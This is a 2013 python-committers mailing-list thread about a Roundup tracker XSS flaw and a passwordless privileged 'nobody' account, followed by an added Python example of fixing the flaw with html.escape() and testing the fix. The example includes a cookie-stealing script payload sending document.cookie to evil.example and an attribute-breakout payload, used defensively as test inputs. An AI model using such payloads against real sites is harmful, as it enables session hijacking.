Hi,

On Mon, Jul 15, 2013 at 2:08 PM, R. David Murray <rdmur...@bitdance.com> wrote:
> On Mon, 15 Jul 2013 11:09:08 +0300, Michael Foord <mich...@voidspace.org.uk> 
> wrote:
>>
>> On 15 Jul 2013, at 11:05, "M.-A. Lemburg" <m...@python.org> wrote:
>>
>> > Who would be the one to contact for issues like these ?
>> >
>> > The case is rather urgent, since the XSS can be used for stealing
>> > session cookies on *.python.org.
>> >
>> > The sorting by password issue is a more obscure one. Just removing
>> > the "feature" to sort by password should be enough to solve it.
>>
>> Technically it's an infrastructure issue (cc'd), but fixing the code of 
>> roundup is hardly their domain.
>>
>> Ezio Melotti (cc'd) did a lot of work on the Python installation of roundup, 
>> so he may have a better idea.
>>
>> We have a security mailing list but that is mainly intended for security 
>> issues in the language:
>>
>>       secur...@python.org <secur...@python.org>
>
> The OP also emailed security (which I heard about via IRC, I'm not
> on that list).
>
> Ezio is a Roundup developer, so he is indeed the best person to look
> at the XSS issue, since it is a Roundup problem and not specific to
> the Tracker.  I can take a look too but he is more knowledgeable
> than I about roundup itself.
>

I don't have time to look at this now, and it might take up to 2 weeks
before I find some time.
The fix is usually as simple as adding a call to escape() in the right
spot, but finding the right spot and testing that the fix works might
take some time.
Before doing this, our Roundup instance should be updated (1.5.0 has
been released recently, but AFAIK it doesn't include a fix for this).
FTR the issue has been reported upstream at
<http://issues.roundup-tracker.org/issue2550817>.

Best Regards,
Ezio Melotti

> There is another problem which is specific to our tracker and which is the
> bigger issue right at the moment.  We have a 'nobody' user with a blank
> password and Developer privileges.
>
> I'm about to go out, so I don't want to make a change that might break
> something right this moment, but anyone with the Coordinator role
> could take this on if they want to do it right now:  remove either the
> Developer role, or both roles, from that user and see what happens.
> I suspect that user should not exist at all, but I don't know for sure.
>
> --David
_______________________________________________
python-committers mailing list
python-committers@python.org
http://mail.python.org/mailman/listinfo/python-committers
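The "call to escape() in the right spot" that Ezio mentions, shown as an added example that is not Roundup's code and not part of the original thread. It uses only the standard library's html.escape(); the row renderer, the field names and the two attacker inputs (a cookie-stealing script for a text node, and a quote breakout for an attribute value) are constructed for illustration. The check function is the kind of regression assertion you would add so the fix is shown to work in both output contexts, which is the part Ezio says takes the time.

```python
import html
import re

# Constructed attacker-controlled values of the kind a tracker echoes back
# (an issue title, a user name). Hypothetical, not from the original report.
COOKIE_STEALER = ('<script>new Image().src="http://evil.example/?c="'
                  '+document.cookie</script>')
ATTR_BREAKOUT = '" onmouseover="alert(document.cookie)'


def render_row_vulnerable(title, author):
    """Before the fix: untrusted values are interpolated verbatim.

    'title' lands in a text node, 'author' inside a quoted attribute;
    both are live injection points.
    """
    return '<tr><td title="%s">%s</td></tr>' % (author, title)


def render_row_fixed(title, author):
    """After the fix: every untrusted value passes through html.escape().

    quote=True also turns " and ' into entities, which is what makes the
    attribute context safe; escape() without it would still let
    ATTR_BREAKOUT close the title="..." attribute.
    """
    return '<tr><td title="%s">%s</td></tr>' % (
        html.escape(author, quote=True),
        html.escape(title, quote=True),
    )


# Characters that can change HTML structure if they reach the page raw.
_STRUCTURAL = re.compile(r'[<>"\']')


def unescaped_reflections(untrusted_values, rendered):
    """Return the untrusted inputs that appear verbatim in the output while
    still carrying a structural character. An empty list means every
    reflection was neutralised; anything else is a remaining XSS sink."""
    return [v for v in untrusted_values
            if _STRUCTURAL.search(v) and v in rendered]


def check_fix():
    """Run both renderers over the constructed inputs and report whether the
    escaped version closes every reflection the vulnerable one leaves open."""
    inputs = [COOKIE_STEALER, ATTR_BREAKOUT]
    before = unescaped_reflections(inputs, render_row_vulnerable(*inputs))
    after = unescaped_reflections(inputs, render_row_fixed(*inputs))
    return {"before": before, "after": after}


if __name__ == "__main__":
    result = check_fix()
    print("still reflected before fix:", len(result["before"]))
    print("still reflected after fix: ", len(result["after"]))
    print(render_row_fixed(COOKIE_STEALER, ATTR_BREAKOUT))
```

The check is deliberately a substring test rather than an HTML parse: if the raw payload text is nowhere in the output, the browser cannot reconstruct it, so the assertion is cheap and hard to get wrong. It does not cover values placed inside a <script> block or a URL attribute, where entity escaping alone is not sufficient; those spots need context-specific encoding, not just escape().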